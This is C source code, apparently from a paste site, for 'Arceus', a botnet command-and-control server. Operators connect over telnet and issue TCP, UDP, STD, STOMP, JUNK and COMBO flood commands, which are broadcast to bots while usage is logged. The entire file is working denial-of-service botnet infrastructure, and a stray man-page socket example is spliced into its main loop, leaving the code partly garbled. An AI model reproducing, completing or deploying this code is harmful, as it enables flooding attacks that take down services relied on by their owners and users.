- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: COMBO \e[91m╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: JUNK unknown_integer HOLD \e[91m║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "TCP")) // TCP ATTACK
- { // Let Us Continue Our Journey!
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: TCP \e[91m╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: TCPFLOOD \e[91m║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "UDP")) // UDP ATTACK
- { // Let Us Continue Our Journey! ╚═════════════════════════════╝ X 31 ||
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: UDP \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: UDPFLOOD \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "STD")) // STD ATTACK
- { // Let Us Continue Our Journey!
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: STD \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: STDFLOOD \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "STOMP")) // STOMP ATTACK
- { // Let Us Continue Our Journey!
- sprintf(arceus, " \e[91m╔════════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: STOMP \e[91m╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: UDP unknown_integer STD unknown_integer TCP \e[91m║ ╚════════════════════════════╝\r\n \e[91m╚════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "JUNK")) // JUNK ATTACK
- { // Let Us Continue Our Journey! ╚══════════════════════╝ unknown_integer 24 || ╔════════════════════════╗ unknown_integer 26
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: JUNK \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: JUNKFLOOD \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if (strstr(arceus_buffer_size, "EXIT") || strstr(arceus_buffer_size, "exit")) // We Are Closing Connection!
- { // Let Us Continue Our Journey!
- goto finish_integer; // We Are Dropping Down to finish_integer:
- } // Let Us Continue Our Journey!
- trim_removev2(arceus_buffer_size);
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if(strlen(arceus_buffer_size) == 0) continue;
- printf("\e[91m[\e[91mArceus\e[91m] \e[91mUser\e[91m:[\e[91m%s\e[91m] \e[91m- \e[91mCommand\e[91m:[\e[91m%s\e[91m]\n",accounts[find_line].username, arceus_buffer_size);
- FILE *arceus_log_file;
- arceus_log_file = fopen("logs/Arceus_C2.log", "a"); // Log Our User -- Just In Case There Are 'Certain Problems'
- fprintf(arceus_log_file, "\e[91m[\e[91mArceus\e[91m] \e[91mUser\e[91m:[\e[91m%s\e[91m] \e[91m- \e[91mCommand\e[91m:[\e[91m%s\e[91m]\n", accounts[find_line].username, arceus_buffer_size);
- fclose(arceus_log_file); // Close The Log File
- arceus_broadcast(arceus_buffer_size, clear_arceus_broadcast, usernamez); // Broadcast The Following Stated -- [Buffer, clear_arceus_broadcast, Usernames]
- memset(arceus_buffer_size, 0, 2048); // Set Data Block And Buffer Size --> 0 -- 2048
- } // Let Us Continue Our Journey!
- finish_integer: // cleanup dead socket
- managements[clear_arceus_broadcast].transmitted_successfully = 0; // Managments Connected, Decrease Value To The Following Value
- close(clear_arceus_broadcast); // Close..
- successful_transmission--; // Display New Value [May Change Output Sequence Later.. It Is Quite Stable]
- }
- void *socket_interpretation_II(int port) // Void, Certain Elements That Will Tailor The Client... [SOCKET INTERPRETATION II.2] -- [STILL IN BETA STAGES, WORK IN PROGRESS...]
- {
- int socket_file_descriptor1, socket_file_descriptor2; // Create Integer For Socket-Feed, New Socket Feed, Automatically Will Write A New Call --
- socklen_t clilen; // New Call Name - Unecessary, But Just Incase, Compiling Is Very Needy And Dependent..
- struct sockaddr_in serv_addr, cli_addr; // Create Struct. For Socket Address.. This Will Subside With Client Address
- socket_file_descriptor1 = socket(AF_INET, SOCK_STREAM, 0); // New Socket Interpreter -- [Made By Zach, I Will Change Subsiding Unit Once Connection Has Been Made]
- if (socket_file_descriptor1 < 0) perror("ERROR opening socket"); // Socket Error Handling, The Stated Integer Value SHOULD NOT Be Greater Than 0 If So, Display Error
- bzero((char *) &serv_addr, sizeof(serv_addr)); // We Will Char An Output Communication Towards The Socket, The Broadcast Will Be Constant
- serv_addr.sin_family = AF_INET; // Our Socket Properties Will Be Set, Using AF_INET. Everything Together = Sin.Family
- serv_addr.sin_addr.s_addr = INADDR_ANY; // Sin Address, Is The Internet Address, It Will Be Set Due To The Client Sending An Income Packet [Test Packet]
- serv_addr.sin_port = htons(port); // Using 'htons' We Will Convert The Port Value, Into A Network Integer For The Server To Communicate Properly
- if (bind(socket_file_descriptor1, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("[Arceus] Screening Error"); // Error Handling Output - Probably Using The Same Port As The Listener
- listen(socket_file_descriptor1,5); // Use Listen Function - Using The '5' Value
- clilen = sizeof(cli_addr); // Define 'clilen' With The Size Of Our Client Address [ User Connecting To The C2 ]
- while(1)
- { printf("\e[91m[\e[91mArceus\e[91m] \e[91mIncoming User Connection From "); // Client Size == The IP Of The User Connecting
- /*
- #define MY_SOCK_PATH "/somepath"
- #define LISTEN_BACKLOG 50
- #define handle_error(msg) \
- do { perror(msg); exit(EXIT_FAILURE); } while (0)
- int
- main(int argc, char *argv[])
- {
- int sfd, cfd;
- struct sockaddr_un my_addr, peer_addr;
- socklen_t peer_addr_size;
- sfd = socket(AF_UNIX, SOCK_STREAM, 0);
- if (sfd == -1)
- handle_error("socket");
- memset(&my_addr, 0, sizeof(struct sockaddr_un));
- my_addr.sun_family = AF_UNIX;
- strncpy(my_addr.sun_path, MY_SOCK_PATH,
- sizeof(my_addr.sun_path) - 1);
- if (bind(sfd, (struct sockaddr *) &my_addr,
- sizeof(struct sockaddr_un)) == -1)
- handle_error("bind");
- if (listen(sfd, LISTEN_BACKLOG) == -1)
- handle_error("listen");
- peer_addr_size = sizeof(struct sockaddr_un);
- cfd = accept(sfd, (struct sockaddr *) &peer_addr,
- &peer_addr_size);
- if (cfd == -1)
- handle_error("accept");
- /* Code to deal with incoming connection(s)...
- /* When no longer required, the socket pathname, MY_SOCK_PATH
- should be deleted using unlink(2) or remove(3)
- */
- arceus_client_address(cli_addr); // Set Client Address, As Variable In Order To Log
- FILE *arceus_log_file; // Use LogFILE Function
- arceus_log_file = fopen("logs/Arceus_Connection.log", "a"); // Create Our Log File.. |Here Is The Output On The Admin Screen|
- fprintf(arceus_log_file, "\e[91m[\e[91mArceus\e[91m] \e[91mIncoming User Connection From \e[91mIP:\e[91m[\e[91m%d.%d.%d.%d\e[91m]\n",cli_addr.sin_addr.s_addr & 0xFF, (cli_addr.sin_addr.s_addr & 0xFF00)>>8, (cli_addr.sin_addr.s_addr & 0xFF0000)>>16, (cli_addr.sin_addr.s_addr & 0xFF000000)>>24);
- fclose(arceus_log_file); // Close Our Log File, After Connection [Client Address] Has Been Logged..
- socket_file_descriptor2 = accept(socket_file_descriptor1, (struct sockaddr *) &cli_addr, &clilen); // Accept New Socket, Minimises Error Of Binding Failure
- if (socket_file_descriptor2 < 0) perror("ERROR on accept"); // Output An Acceptance -- Something's Went Wrong -- Hard To Detail
- pthread_t thread; // Use Pthread, To Set All Network Functions As One Thread -- [So We Can Parse Threads To The Client]
- pthread_create( &thread, NULL, &arceus_telnet_data, (void *)socket_file_descriptor2); // Create The Thread '&thread, NULL, &arceus_telnet_data, (void *)socket_file_descriptor2'
- }
- }
- int main (int argc, char *argv[], void *sock) // Set Integers For Arguements - Then Char For Output Communication
- {
- signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
- int s, threads, port; // Creating Integers For 'Threads & Port'
- struct epoll_event event; // Create Struct, For EPOLL, We Will Use This For Our Sockets
- if (argc != 4) // Set Argument Value, [Default Execution Output Argument Value]
- {
- fprintf (stderr, "\e[91mWelcome To Arceus-BETA-\e[91m9\n");
- fprintf (stderr, "Usage: %s \e[91m[\e[91mport\e[91m] [\e[91mthreads\e[91m] [\e[91mcnc-port\e[91m]\n", argv[0]); // Display Help [Only If All Arguments Have Not Been Applied]
- exit (EXIT_FAILURE); // No Failure, Just No Arguments
- }
- port = atoi(argv[3]); // Set Argument Value '3' - For Port
- threads = atoi(argv[2]); // Set Argument Value '2' - For Threads
- if (threads > 1000) // Thread Limit - Change It If You Want - These Are My Recommendations
- {
- printf("[Arceus] Thread Limit Exceeded! Please Lower Threat Count!\n"); // Are You Stupid? - Do You Wanna Really Try To Broadcast With EXTREME Network Output??
- return 0; // Kill
- }
- else if (threads < 1000) // You Have Picked A Reasonible Thread Number - Thank You For Listening To Me :)
- {
- printf(""); // printf("Well Done You Absolute Uncultured Swine, You Aren't A Skid After All...");
- }
- printf("\e[91m╔═══════════════════════════════════╗\r\n\e[91m║ \e[91mWelcome To Arceus \e[91m║\r\n\e[91m║ \e[91mC2 x Telnet Layer \e[91m╠════════╗\r\n\e[91m║ \e[91mServer Is Sucessfully Screened! \e[91m║ ║ ╔════════════════════════╗\r\n\e[91m╚═════╦═════════════════════════════╝ ╚═════╣ \e[91mCreated By Jack x Zach \e[91m║\r\n \e[91m║ ╚═════╦══════════════════╝\r\n \e[91m║ ╔════╗ \e[91m║\r\n \e[91m╚═══╣ \e[91m<3 \e[91m╠═════╗ ╔════════════╗ \e[91m║\r\n \e[91m╚════╝ ║ ║ \e[91mRIP Katura \e[91m╠════════════╝\r\n \e[91m║ ╚═══╦════════╝\r\n \e[91m║ ║\r\n \e[91m║ ║\r\n \e[91m╚═════════════╝\r\n");
- listeninginterpretation = socket_intepretation_modified(argv[1]); // try to create a listening socket, die if we can't
- if (listeninginterpretation == -1) abort(); // Killing Myself
- s = socket_interpretation_block_v1 (listeninginterpretation); // try to make it nonblocking, die if we can't
- if (s == -1) abort(); // Killing Myself
- s = listen (listeninginterpretation, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
- if (s == -1) // Check If I Wanna Die..
- {
- perror ("arceus_listening_interpretation : failed"); // Listen - Error
- abort (); // Yep, I wanna die..
- }
- bindinginterpreter = epoll_create1 (0); // make an epoll listener, die if we can't
- if (bindinginterpreter == -1) // Check If I Wanna Die Again..
- {
- perror ("arceus_socket_binding_epoll : failed"); // EPOLL_ERROR - Yeah...
- abort (); // Okay Sure, Let's Die..
- }
- event.data.fd = listeninginterpretation; // EPOLL_EVENT DATA
- event.events = EPOLLIN | EPOLLET; // EPOLL_USE MODULES
- s = epoll_ctl (bindinginterpreter, EPOLL_CTL_ADD, listeninginterpretation, &event); // EPOLL_USE_MODULES -- USE FUNCTION : (bindinginterpreter, EPOLL_CTL_ADD, listeninginterpretation, &event)
- if (s == -1) // Check If I Wanna Die Again..
- {
- perror ("arceus_epoll_ctl : failed");
- abort (); // Yeah, Let's Die.. One More Time..
- }
- pthread_t thread[threads + 2]; // Use Pthread Thread + 2, Because We Want A Strong Independent Connection
- while(threads--) // While [Thread Count]
- {
- pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
- }
- pthread_create(&thread[0], NULL, &socket_interpretation_II, port); // Make A Thread To Individually Subside The Network Functions To The Client
- while(1) // Let's Wait A WHILE... [1 Second.. We Want Stability.. Right??]
- {
- arceus_broadcast("SUCC", -1, "STRING"); // Broadcast
- sleep(60); // Lemme Sleep The Thread For 60 Seconds..
- }
- close (listeninginterpretation); // Close The Listening FileD, Socket -- Terminate Concurrent Function
- return EXIT_SUCCESS; // Exit Successfully, Using Return Statement.
- } // Arceus I [BETA] - 10
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement